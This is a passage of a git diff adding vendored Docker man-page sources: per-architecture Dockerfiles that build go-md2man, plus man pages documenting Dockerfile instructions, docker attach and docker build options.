https://github.com/Masterminds/glide.git ${TARGET}/glide && \ + cd ${TARGET}/glide && \ + git checkout $GLIDE && \ + make build && \ + cp ./glide /usr/bin/glide && \ + cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* + +COPY glide.yaml /manvendor/ +COPY glide.lock /manvendor/ +WORKDIR /manvendor/ +RUN glide install && mv vendor src +ENV GOPATH=$GOPATH:/manvendor +RUN go build -o /usr/bin/go-md2man 
github.com/cpuguy83/go-md2man + +WORKDIR /go/src/github.com/docker/docker/ +ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.5.md b/vendor/github.com/docker/docker/man/Dockerfile.5.md new file mode 100644 index 0000000000..5191b1930a --- /dev/null +++ b/vendor/github.com/docker/docker/man/Dockerfile.5.md @@ -0,0 +1,474 @@ +% DOCKERFILE(5) Docker User Manuals +% Zac Dover +% May 2014 +# NAME + +Dockerfile - automate the steps of creating a Docker image + +# INTRODUCTION + +The **Dockerfile** is a configuration file that automates the steps of creating +a Docker image. It is similar to a Makefile. Docker reads instructions from the +**Dockerfile** to automate the steps otherwise performed manually to create an +image. To build an image, create a file called **Dockerfile**. + +The **Dockerfile** describes the steps taken to assemble the image. When the +**Dockerfile** has been created, call the `docker build` command, using the +path of directory that contains **Dockerfile** as the argument. + +# SYNOPSIS + +INSTRUCTION arguments + +For example: + + FROM image + +# DESCRIPTION + +A Dockerfile is a file that automates the steps of creating a Docker image. +A Dockerfile is similar to a Makefile. + +# USAGE + + docker build . + + -- Runs the steps and commits them, building a final image. + The path to the source repository defines where to find the context of the + build. The build is run by the Docker daemon, not the CLI. The whole + context must be transferred to the daemon. The Docker CLI reports + `"Sending build context to Docker daemon"` when the context is sent to the + daemon. + + ``` + docker build -t repository/tag . + ``` + + -- specifies a repository and tag at which to save the new image if the build + succeeds. The Docker daemon runs the steps one-by-one, committing the result + to a new image if necessary, before finally outputting the ID of the new + image. 
The Docker daemon automatically cleans up the context it is given. + + Docker re-uses intermediate images whenever possible. This significantly + accelerates the *docker build* process. + +# FORMAT + + `FROM image` + + `FROM image:tag` + + `FROM image@digest` + + -- The **FROM** instruction sets the base image for subsequent instructions. A + valid Dockerfile must have **FROM** as its first instruction. The image can be any + valid image. It is easy to start by pulling an image from the public + repositories. + + -- **FROM** must be the first non-comment instruction in Dockerfile. + + -- **FROM** may appear multiple times within a single Dockerfile in order to create + multiple images. Make a note of the last image ID output by the commit before + each new **FROM** command. + + -- If no tag is given to the **FROM** instruction, Docker applies the + `latest` tag. If the used tag does not exist, an error is returned. + + -- If no digest is given to the **FROM** instruction, Docker applies the + `latest` tag. If the used tag does not exist, an error is returned. + +**MAINTAINER** + -- **MAINTAINER** sets the Author field for the generated images. + Useful for providing users with an email or url for support. + +**RUN** + -- **RUN** has two forms: + + ``` + # the command is run in a shell - /bin/sh -c + RUN + + # Executable form + RUN ["executable", "param1", "param2"] + ``` + + + -- The **RUN** instruction executes any commands in a new layer on top of the current + image and commits the results. The committed image is used for the next step in + Dockerfile. + + -- Layering **RUN** instructions and generating commits conforms to the core + concepts of Docker where commits are cheap and containers can be created from + any point in the history of an image. This is similar to source control. The + exec form makes it possible to avoid shell string munging. The exec form makes + it possible to **RUN** commands using a base image that does not contain `/bin/sh`. 
+ + Note that the exec form is parsed as a JSON array, which means that you must + use double-quotes (") around words not single-quotes ('). + +**CMD** + -- **CMD** has three forms: + + ``` + # Executable form + CMD ["executable", "param1", "param2"]` + + # Provide default arguments to ENTRYPOINT + CMD ["param1", "param2"]` + + # the command is run in a shell - /bin/sh -c + CMD command param1 param2 + ``` + + -- There should be only one **CMD** in a Dockerfile. If more than one **CMD** is listed, only + the last **CMD** takes effect. + The main purpose of a **CMD** is to provide defaults for an executing container. + These defaults may include an executable, or they can omit the executable. If + they omit the executable, an **ENTRYPOINT** must be specified. + When used in the shell or exec formats, the **CMD** instruction sets the command to + be executed when running the image. + If you use the shell form of the **CMD**, the `` executes in `/bin/sh -c`: + + Note that the exec form is parsed as a JSON array, which means that you must + use double-quotes (") around words not single-quotes ('). + + ``` + FROM ubuntu + CMD echo "This is a test." | wc - + ``` + + -- If you run **command** without a shell, then you must express the command as a + JSON array and give the full path to the executable. This array form is the + preferred form of **CMD**. All additional parameters must be individually expressed + as strings in the array: + + ``` + FROM ubuntu + CMD ["/usr/bin/wc","--help"] + ``` + + -- To make the container run the same executable every time, use **ENTRYPOINT** in + combination with **CMD**. + If the user specifies arguments to `docker run`, the specified commands + override the default in **CMD**. + Do not confuse **RUN** with **CMD**. **RUN** runs a command and commits the result. + **CMD** executes nothing at build time, but specifies the intended command for + the image. + +**LABEL** + -- `LABEL = [= ...]`or + ``` + LABEL [ ] + LABEL [ ] + ... 
+ ``` + The **LABEL** instruction adds metadata to an image. A **LABEL** is a + key-value pair. To specify a **LABEL** without a value, simply use an empty + string. To include spaces within a **LABEL** value, use quotes and + backslashes as you would in command-line parsing. + + ``` + LABEL com.example.vendor="ACME Incorporated" + LABEL com.example.vendor "ACME Incorporated" + LABEL com.example.vendor.is-beta "" + LABEL com.example.vendor.is-beta= + LABEL com.example.vendor.is-beta="" + ``` + + An image can have more than one label. To specify multiple labels, separate + each key-value pair by a space. + + Labels are additive including `LABEL`s in `FROM` images. As the system + encounters and then applies a new label, new `key`s override any previous + labels with identical keys. + + To display an image's labels, use the `docker inspect` command. + +**EXPOSE** + -- `EXPOSE [...]` + The **EXPOSE** instruction informs Docker that the container listens on the + specified network ports at runtime. Docker uses this information to + interconnect containers using links and to set up port redirection on the host + system. + +**ENV** + -- `ENV ` + The **ENV** instruction sets the environment variable to + the value ``. This value is passed to all future + **RUN**, **ENTRYPOINT**, and **CMD** instructions. This is + functionally equivalent to prefixing the command with `=`. The + environment variables that are set with **ENV** persist when a container is run + from the resulting image. Use `docker inspect` to inspect these values, and + change them using `docker run --env =`. + + Note that setting "`ENV DEBIAN_FRONTEND noninteractive`" may cause + unintended consequences, because it will persist when the container is run + interactively, as with the following command: `docker run -t -i image bash` + +**ADD** + -- **ADD** has two forms: + + ``` + ADD + + # Required for paths with whitespace + ADD ["",... 
""] + ``` + + The **ADD** instruction copies new files, directories + or remote file URLs to the filesystem of the container at path ``. + Multiple `` resources may be specified but if they are files or directories + then they must be relative to the source directory that is being built + (the context of the build). The `` is the absolute path, or path relative + to **WORKDIR**, into which the source is copied inside the target container. + If the `` argument is a local file in a recognized compression format + (tar, gzip, bzip2, etc) then it is unpacked at the specified `` in the + container's filesystem. Note that only local compressed files will be unpacked, + i.e., the URL download and archive unpacking features cannot be used together. + All new directories are created with mode 0755 and with the uid and gid of **0**. + +**COPY** + -- **COPY** has two forms: + + ``` + COPY + + # Required for paths with whitespace + COPY ["",... ""] + ``` + + The **COPY** instruction copies new files from `` and + adds them to the filesystem of the container at path . The `` must be + the path to a file or directory relative to the source directory that is + being built (the context of the build) or a remote file URL. The `` is an + absolute path, or a path relative to **WORKDIR**, into which the source will + be copied inside the target container. If you **COPY** an archive file it will + land in the container exactly as it appears in the build context without any + attempt to unpack it. All new files and directories are created with mode **0755** + and with the uid and gid of **0**. + +**ENTRYPOINT** + -- **ENTRYPOINT** has two forms: + + ``` + # executable form + ENTRYPOINT ["executable", "param1", "param2"]` + + # run command in a shell - /bin/sh -c + ENTRYPOINT command param1 param2 + ``` + + -- An **ENTRYPOINT** helps you configure a + container that can be run as an executable. 
When you specify an **ENTRYPOINT**,
+ the whole container runs as if it was only that executable. The **ENTRYPOINT**
+ instruction adds an entry command that is not overwritten when arguments are
+ passed to docker run. This is different from the behavior of **CMD**. This allows
+ arguments to be passed to the entrypoint, for instance `docker run -d`
+ passes the -d argument to the **ENTRYPOINT**. Specify parameters either in the
+ **ENTRYPOINT** JSON array (as in the preferred exec form above), or by using a **CMD**
+ statement. Parameters in the **ENTRYPOINT** are not overwritten by the docker run
+ arguments. Parameters specified via **CMD** are overwritten by docker run
+ arguments. Specify a plain string for the **ENTRYPOINT**, and it will execute in
+ `/bin/sh -c`, like a **CMD** instruction:
+
+ ```
+ FROM ubuntu
+ ENTRYPOINT wc -l -
+ ```
+
+ This means that the Dockerfile's image always takes stdin as input (that's
+ what "-" means), and prints the number of lines (that's what "-l" means). To
+ make this optional but default, use a **CMD**:
+
+ ```
+ FROM ubuntu
+ CMD ["-l", "-"]
+ ENTRYPOINT ["/usr/bin/wc"]
+ ```
+
+**VOLUME**
+ -- `VOLUME ["/data"]`
+ The **VOLUME** instruction creates a mount point with the specified name and marks
+ it as holding externally-mounted volumes from the native host or from other
+ containers.
+
+**USER**
+ -- `USER daemon`
+ Sets the username or UID used for running subsequent commands.
+
+ The **USER** instruction can optionally be used to set the group or GID. The
+ following examples are all valid:
+ USER [user | user:group | uid | uid:gid | user:gid | uid:group ]
+
+ Until the **USER** instruction is set, instructions will be run as root. The USER
+ instruction can be used any number of times in a Dockerfile, and will only affect
+ subsequent commands.
+ +**WORKDIR** + -- `WORKDIR /path/to/workdir` + The **WORKDIR** instruction sets the working directory for the **RUN**, **CMD**, + **ENTRYPOINT**, **COPY** and **ADD** Dockerfile commands that follow it. It can + be used multiple times in a single Dockerfile. Relative paths are defined + relative to the path of the previous **WORKDIR** instruction. For example: + + ``` + WORKDIR /a + WORKDIR b + WORKDIR c + RUN pwd + ``` + + In the above example, the output of the **pwd** command is **a/b/c**. + +**ARG** + -- ARG [=] + + The `ARG` instruction defines a variable that users can pass at build-time to + the builder with the `docker build` command using the `--build-arg + =` flag. If a user specifies a build argument that was not + defined in the Dockerfile, the build outputs a warning. + + ``` + [Warning] One or more build-args [foo] were not consumed + ``` + + The Dockerfile author can define a single variable by specifying `ARG` once or many + variables by specifying `ARG` more than once. For example, a valid Dockerfile: + + ``` + FROM busybox + ARG user1 + ARG buildno + ... + ``` + + A Dockerfile author may optionally specify a default value for an `ARG` instruction: + + ``` + FROM busybox + ARG user1=someuser + ARG buildno=1 + ... + ``` + + If an `ARG` value has a default and if there is no value passed at build-time, the + builder uses the default. + + An `ARG` variable definition comes into effect from the line on which it is + defined in the `Dockerfile` not from the argument's use on the command-line or + elsewhere. For example, consider this Dockerfile: + + ``` + 1 FROM busybox + 2 USER ${user:-some_user} + 3 ARG user + 4 USER $user + ... + ``` + A user builds this file by calling: + + ``` + $ docker build --build-arg user=what_user Dockerfile + ``` + + The `USER` at line 2 evaluates to `some_user` as the `user` variable is defined on the + subsequent line 3. 
The `USER` at line 4 evaluates to `what_user` as `user` is + defined and the `what_user` value was passed on the command line. Prior to its definition by an + `ARG` instruction, any use of a variable results in an empty string. + + > **Warning:** It is not recommended to use build-time variables for + > passing secrets like github keys, user credentials etc. Build-time variable + > values are visible to any user of the image with the `docker history` command. + + You can use an `ARG` or an `ENV` instruction to specify variables that are + available to the `RUN` instruction. Environment variables defined using the + `ENV` instruction always override an `ARG` instruction of the same name. Consider + this Dockerfile with an `ENV` and `ARG` instruction. + + ``` + 1 FROM ubuntu + 2 ARG CONT_IMG_VER + 3 ENV CONT_IMG_VER v1.0.0 + 4 RUN echo $CONT_IMG_VER + ``` + Then, assume this image is built with this command: + + ``` + $ docker build --build-arg CONT_IMG_VER=v2.0.1 Dockerfile + ``` + + In this case, the `RUN` instruction uses `v1.0.0` instead of the `ARG` setting + passed by the user:`v2.0.1` This behavior is similar to a shell + script where a locally scoped variable overrides the variables passed as + arguments or inherited from environment, from its point of definition. + + Using the example above but a different `ENV` specification you can create more + useful interactions between `ARG` and `ENV` instructions: + + ``` + 1 FROM ubuntu + 2 ARG CONT_IMG_VER + 3 ENV CONT_IMG_VER ${CONT_IMG_VER:-v1.0.0} + 4 RUN echo $CONT_IMG_VER + ``` + + Unlike an `ARG` instruction, `ENV` values are always persisted in the built + image. Consider a docker build without the --build-arg flag: + + ``` + $ docker build Dockerfile + ``` + + Using this Dockerfile example, `CONT_IMG_VER` is still persisted in the image but + its value would be `v1.0.0` as it is the default set in line 3 by the `ENV` instruction. 
+ + The variable expansion technique in this example allows you to pass arguments + from the command line and persist them in the final image by leveraging the + `ENV` instruction. Variable expansion is only supported for [a limited set of + Dockerfile instructions.](#environment-replacement) + + Docker has a set of predefined `ARG` variables that you can use without a + corresponding `ARG` instruction in the Dockerfile. + + * `HTTP_PROXY` + * `http_proxy` + * `HTTPS_PROXY` + * `https_proxy` + * `FTP_PROXY` + * `ftp_proxy` + * `NO_PROXY` + * `no_proxy` + + To use these, simply pass them on the command line using the `--build-arg + =` flag. + +**ONBUILD** + -- `ONBUILD [INSTRUCTION]` + The **ONBUILD** instruction adds a trigger instruction to an image. The + trigger is executed at a later time, when the image is used as the base for + another build. Docker executes the trigger in the context of the downstream + build, as if the trigger existed immediately after the **FROM** instruction in + the downstream Dockerfile. + + You can register any build instruction as a trigger. A trigger is useful if + you are defining an image to use as a base for building other images. For + example, if you are defining an application build environment or a daemon that + is customized with a user-specific configuration. + + Consider an image intended as a reusable python application builder. It must + add application source code to a particular directory, and might need a build + script called after that. You can't just call **ADD** and **RUN** now, because + you don't yet have access to the application source code, and it is different + for each application build. + + -- Providing application developers with a boilerplate Dockerfile to copy-paste + into their application is inefficient, error-prone, and + difficult to update because it mixes with application-specific code. 
+ The solution is to use **ONBUILD** to register instructions in advance, to + run later, during the next build stage. + +# HISTORY +*May 2014, Compiled by Zac Dover (zdover at redhat dot com) based on docker.com Dockerfile documentation. +*Feb 2015, updated by Brian Goff (cpuguy83@gmail.com) for readability +*Sept 2015, updated by Sally O'Malley (somalley@redhat.com) +*Oct 2016, updated by Addam Hardy (addam.hardy@gmail.com) diff --git a/vendor/github.com/docker/docker/man/Dockerfile.aarch64 b/vendor/github.com/docker/docker/man/Dockerfile.aarch64 new file mode 100644 index 0000000000..e788eb1c1d --- /dev/null +++ b/vendor/github.com/docker/docker/man/Dockerfile.aarch64 @@ -0,0 +1,25 @@ +FROM aarch64/ubuntu:xenial + +RUN apt-get update && apt-get install -y git golang-go + +RUN mkdir -p /go/src /go/bin /go/pkg +ENV GOPATH=/go +RUN export GLIDE=v0.11.1; \ + export TARGET=/go/src/github.com/Masterminds; \ + mkdir -p ${TARGET} && \ + git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ + cd ${TARGET}/glide && \ + git checkout $GLIDE && \ + make build && \ + cp ./glide /usr/bin/glide && \ + cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* + +COPY glide.yaml /manvendor/ +COPY glide.lock /manvendor/ +WORKDIR /manvendor/ +RUN glide install && mv vendor src +ENV GOPATH=$GOPATH:/manvendor +RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man + +WORKDIR /go/src/github.com/docker/docker/ +ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.armhf b/vendor/github.com/docker/docker/man/Dockerfile.armhf new file mode 100644 index 0000000000..e7ea495646 --- /dev/null +++ b/vendor/github.com/docker/docker/man/Dockerfile.armhf @@ -0,0 +1,43 @@ +FROM armhf/debian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +RUN apt-get update && apt-get install -y \ + git \ + bash \ + curl \ + gcc \ + make + +ENV 
GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" \ + | tar -xzC /usr/local +ENV PATH /go/bin:/usr/local/go/bin:$PATH +ENV GOPATH /go + +# We're building for armhf, which is ARMv7, so let's be explicit about that +ENV GOARCH arm +ENV GOARM 7 + +RUN mkdir -p /go/src /go/bin /go/pkg +RUN export GLIDE=v0.11.1; \ + export TARGET=/go/src/github.com/Masterminds; \ + mkdir -p ${TARGET} && \ + git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ + cd ${TARGET}/glide && \ + git checkout $GLIDE && \ + make build && \ + cp ./glide /usr/bin/glide && \ + cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* + +COPY glide.yaml /manvendor/ +COPY glide.lock /manvendor/ +WORKDIR /manvendor/ +RUN glide install && mv vendor src +ENV GOPATH=$GOPATH:/manvendor +RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man + +WORKDIR /go/src/github.com/docker/docker/ +ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.ppc64le b/vendor/github.com/docker/docker/man/Dockerfile.ppc64le new file mode 100644 index 0000000000..fc96ca7691 --- /dev/null +++ b/vendor/github.com/docker/docker/man/Dockerfile.ppc64le @@ -0,0 +1,35 @@ +FROM ppc64le/ubuntu:xenial + +RUN apt-get update && apt-get install -y \ + curl \ + gcc \ + git \ + make \ + tar + +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" \ + | tar -xzC /usr/local +ENV PATH /usr/local/go/bin:$PATH +ENV GOPATH=/go + +RUN mkdir -p /go/src /go/bin /go/pkg +RUN export GLIDE=v0.11.1; \ + export TARGET=/go/src/github.com/Masterminds; \ + mkdir -p ${TARGET} && \ + git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ + cd ${TARGET}/glide && \ + git checkout $GLIDE && \ + make build && \ + cp ./glide /usr/bin/glide && \ + cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* + +COPY glide.yaml /manvendor/ +COPY glide.lock /manvendor/ +WORKDIR /manvendor/ +RUN glide install && mv vendor src +ENV 
GOPATH=$GOPATH:/manvendor +RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man + +WORKDIR /go/src/github.com/docker/docker/ +ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.s390x b/vendor/github.com/docker/docker/man/Dockerfile.s390x new file mode 100644 index 0000000000..d4bcf1da11 --- /dev/null +++ b/vendor/github.com/docker/docker/man/Dockerfile.s390x @@ -0,0 +1,35 @@ +FROM s390x/ubuntu:xenial + +RUN apt-get update && apt-get install -y \ + curl \ + gcc \ + git \ + make \ + tar + +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" \ + | tar -xzC /usr/local +ENV PATH /usr/local/go/bin:$PATH +ENV GOPATH=/go + +RUN mkdir -p /go/src /go/bin /go/pkg +RUN export GLIDE=v0.11.1; \ + export TARGET=/go/src/github.com/Masterminds; \ + mkdir -p ${TARGET} && \ + git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ + cd ${TARGET}/glide && \ + git checkout $GLIDE && \ + make build && \ + cp ./glide /usr/bin/glide && \ + cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* + +COPY glide.yaml /manvendor/ +COPY glide.lock /manvendor/ +WORKDIR /manvendor/ +RUN glide install && mv vendor src +ENV GOPATH=$GOPATH:/manvendor +RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man + +WORKDIR /go/src/github.com/docker/docker/ +ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/README.md b/vendor/github.com/docker/docker/man/README.md new file mode 100644 index 0000000000..82dac650f9 --- /dev/null +++ b/vendor/github.com/docker/docker/man/README.md @@ -0,0 +1,15 @@ +Docker Documentation +==================== + +This directory contains scripts for generating the man pages. Many of the man +pages are generated directly from the `spf13/cobra` `Command` definition. Some +legacy pages are still generated from the markdown files in this directory. +Do *not* edit the man pages in the man1 directory. 
Instead, update the +Cobra command or amend the Markdown files for legacy pages. + + +## Generate the man pages + +From within the project root directory run: + + make manpages diff --git a/vendor/github.com/docker/docker/man/docker-attach.1.md b/vendor/github.com/docker/docker/man/docker-attach.1.md new file mode 100644 index 0000000000..c39d1c9290 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-attach.1.md @@ -0,0 +1,99 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-attach - Attach to a running container + +# SYNOPSIS +**docker attach** +[**--detach-keys**[=*[]*]] +[**--help**] +[**--no-stdin**] +[**--sig-proxy**[=*true*]] +CONTAINER + +# DESCRIPTION +The **docker attach** command allows you to attach to a running container using +the container's ID or name, either to view its ongoing output or to control it +interactively. You can attach to the same contained process multiple times +simultaneously, screen sharing style, or quickly view the progress of your +detached process. + +To stop a container, use `CTRL-c`. This key sequence sends `SIGKILL` to the +container. You can detach from the container (and leave it running) using a +configurable key sequence. The default sequence is `CTRL-p CTRL-q`. You +configure the key sequence using the **--detach-keys** option or a configuration +file. See **config-json(5)** for documentation on using a configuration file. + +It is forbidden to redirect the standard input of a `docker attach` command while +attaching to a tty-enabled container (i.e.: launched with `-t`). + +# OPTIONS +**--detach-keys**="" + Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. + +**--help** + Print usage statement + +**--no-stdin**=*true*|*false* + Do not attach STDIN. The default is *false*. + +**--sig-proxy**=*true*|*false* + Proxy all received signals to the process (non-TTY mode only). 
SIGCHLD, SIGKILL, and SIGSTOP are not proxied. The default is *true*. + +# Override the detach sequence + +If you want, you can configure an override the Docker key sequence for detach. +This is useful if the Docker default sequence conflicts with key sequence you +use for other applications. There are two ways to define your own detach key +sequence, as a per-container override or as a configuration property on your +entire configuration. + +To override the sequence for an individual container, use the +`--detach-keys=""` flag with the `docker attach` command. The format of +the `` is either a letter [a-Z], or the `ctrl-` combined with any of +the following: + +* `a-z` (a single lowercase alpha character ) +* `@` (at sign) +* `[` (left bracket) +* `\\` (two backward slashes) +* `_` (underscore) +* `^` (caret) + +These `a`, `ctrl-a`, `X`, or `ctrl-\\` values are all examples of valid key +sequences. To configure a different configuration default key sequence for all +containers, see **docker(1)**. + +# EXAMPLES + +## Attaching to a container + +In this example the top command is run inside a container, from an image called +fedora, in detached mode. 
The ID from the container is passed into the **docker +attach** command: + + # ID=$(sudo docker run -d fedora /usr/bin/top -b) + # sudo docker attach $ID + top - 02:05:52 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 + Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie + Cpu(s): 0.1%us, 0.2%sy, 0.0%ni, 99.7%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st + Mem: 373572k total, 355560k used, 18012k free, 27872k buffers + Swap: 786428k total, 0k used, 786428k free, 221740k cached + + PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND + 1 root 20 0 17200 1116 912 R 0 0.3 0:00.03 top + + top - 02:05:55 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 + Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie + Cpu(s): 0.0%us, 0.2%sy, 0.0%ni, 99.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st + Mem: 373572k total, 355244k used, 18328k free, 27872k buffers + Swap: 786428k total, 0k used, 786428k free, 221776k cached + + PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND + 1 root 20 0 17208 1144 932 R 0 0.3 0:00.03 top + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. 
+June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-build.1.md b/vendor/github.com/docker/docker/man/docker-build.1.md new file mode 100644 index 0000000000..4beee88e4a --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-build.1.md @@ -0,0 +1,340 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-build - Build an image from a Dockerfile + +# SYNOPSIS +**docker build** +[**--build-arg**[=*[]*]] +[**--cpu-shares**[=*0*]] +[**--cgroup-parent**[=*CGROUP-PARENT*]] +[**--help**] +[**-f**|**--file**[=*PATH/Dockerfile*]] +[**-squash**] *Experimental* +[**--force-rm**] +[**--isolation**[=*default*]] +[**--label**[=*[]*]] +[**--no-cache**] +[**--pull**] +[**--compress**] +[**-q**|**--quiet**] +[**--rm**[=*true*]] +[**-t**|**--tag**[=*[]*]] +[**-m**|**--memory**[=*MEMORY*]] +[**--memory-swap**[=*LIMIT*]] +[**--network**[=*"default"*]] +[**--shm-size**[=*SHM-SIZE*]] +[**--cpu-period**[=*0*]] +[**--cpu-quota**[=*0*]] +[**--cpuset-cpus**[=*CPUSET-CPUS*]] +[**--cpuset-mems**[=*CPUSET-MEMS*]] +[**--ulimit**[=*[]*]] +PATH | URL | - + +# DESCRIPTION +This will read the Dockerfile from the directory specified in **PATH**. +It also sends any other files and directories found in the current +directory to the Docker daemon. The contents of this directory would +be used by **ADD** commands found within the Dockerfile. + +Warning, this will send a lot of data to the Docker daemon depending +on the contents of the current directory. The build is run by the Docker +daemon, not by the CLI, so the whole context must be transferred to the daemon. +The Docker CLI reports "Sending build context to Docker daemon" when the context is sent to +the daemon. + +When the URL to a tarball archive or to a single Dockerfile is given, no context is sent from +the client to the Docker daemon. In this case, the Dockerfile at the root of the archive and +the rest of the archive will get used as the context of the build. 
When a Git repository is +set as the **URL**, the repository is cloned locally and then sent as the context. + +# OPTIONS +**-f**, **--file**=*PATH/Dockerfile* + Path to the Dockerfile to use. If the path is a relative path and you are + building from a local directory, then the path must be relative to that + directory. If you are building from a remote URL pointing to either a + tarball or a Git repository, then the path must be relative to the root of + the remote context. In all cases, the file must be within the build context. + The default is *Dockerfile*. + +**--squash**=*true*|*false* + **Experimental Only** + Once the image is built, squash the new layers into a new image with a single + new layer. Squashing does not destroy any existing image, rather it creates a new + image with the content of the squashed layers. This effectively makes it look + like all `Dockerfile` commands were created with a single layer. The build + cache is preserved with this method. + + **Note**: using this option means the new image will not be able to take + advantage of layer sharing with other images and may use significantly more + space. + + **Note**: using this option you may see significantly more space used due to + storing two copies of the image, one for the build cache with all the cache + layers intact, and one for the squashed version. + +**--build-arg**=*variable* + name and value of a **buildarg**. + + For example, if you want to pass a value for `http_proxy`, use + `--build-arg=http_proxy="http://some.proxy.url"` + + Users pass these values at build-time. Docker uses the `buildargs` as the + environment context for command(s) run via the Dockerfile's `RUN` instruction + or for variable expansion in other Dockerfile instructions. This is not meant + for passing secret values. 
[Read more about the buildargs instruction](https://docs.docker.com/engine/reference/builder/#arg) + +**--force-rm**=*true*|*false* + Always remove intermediate containers, even after unsuccessful builds. The default is *false*. + +**--isolation**="*default*" + Isolation specifies the type of isolation technology used by containers. + +**--label**=*label* + Set metadata for an image + +**--no-cache**=*true*|*false* + Do not use cache when building the image. The default is *false*. + +**--help** + Print usage statement + +**--pull**=*true*|*false* + Always attempt to pull a newer version of the image. The default is *false*. + +**--compress**=*true*|*false* + Compress the build context using gzip. The default is *false*. + +**-q**, **--quiet**=*true*|*false* + Suppress the build output and print image ID on success. The default is *false*. + +**--rm**=*true*|*false* + Remove intermediate containers after a successful build. The default is *true*. + +**-t**, **--tag**="" + Repository names (and optionally with tags) to be applied to the resulting + image in case of success. Refer to **docker-tag(1)** for more information + about valid tag names. + +**-m**, **--memory**=*MEMORY* + Memory limit + +**--memory-swap**=*LIMIT* + A limit value equal to memory plus swap. Must be used with the **-m** +(**--memory**) flag. The swap `LIMIT` should always be larger than **-m** +(**--memory**) value. + + The format of `LIMIT` is `[]`. Unit can be `b` (bytes), +`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a +unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap. + +**--network**=*bridge* + Set the networking mode for the RUN instructions during build. Supported standard + values are: `bridge`, `host`, `none` and `container:`. Any other value + is taken as a custom network's name or ID which this container should connect to. + +**--shm-size**=*SHM-SIZE* + Size of `/dev/shm`. The format is ``. `number` must be greater than `0`. 
+ Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes. + If you omit the size entirely, the system uses `64m`. + +**--cpu-shares**=*0* + CPU shares (relative weight). + + By default, all containers get the same proportion of CPU cycles. + CPU shares is a 'relative weight', relative to the default setting of 1024. + This default value is defined here: + ``` + cat /sys/fs/cgroup/cpu/cpu.shares + 1024 + ``` + You can change this proportion by adjusting the container's CPU share + weighting relative to the weighting of all other running containers. + + To modify the proportion from the default of 1024, use the **--cpu-shares** + flag to set the weighting to 2 or higher. + + Container CPU share Flag + {C0} 60% of CPU --cpu-shares=614 (614 is 60% of 1024) + {C1} 40% of CPU --cpu-shares=410 (410 is 40% of 1024) + + The proportion is only applied when CPU-intensive processes are running. + When tasks in one container are idle, the other containers can use the + left-over CPU time. The actual amount of CPU time used varies depending on + the number of containers running on the system. + + For example, consider three containers, where one has **--cpu-shares=1024** and + two others have **--cpu-shares=512**. When processes in all three + containers attempt to use 100% of CPU, the first container would receive + 50% of the total CPU time. If you add a fourth container with **--cpu-shares=1024**, + the first container only gets 33% of the CPU. The remaining containers + receive 16.5%, 16.5% and 33% of the CPU. + + + Container CPU share Flag CPU time + {C0} 100% --cpu-shares=1024 33% + {C1} 50% --cpu-shares=512 16.5% + {C2} 50% --cpu-shares=512 16.5% + {C4} 100% --cpu-shares=1024 33% + + + On a multi-core system, the shares of CPU time are distributed across the CPU + cores. Even if a container is limited to less than 100% of CPU time, it can + use 100% of each individual CPU core. 
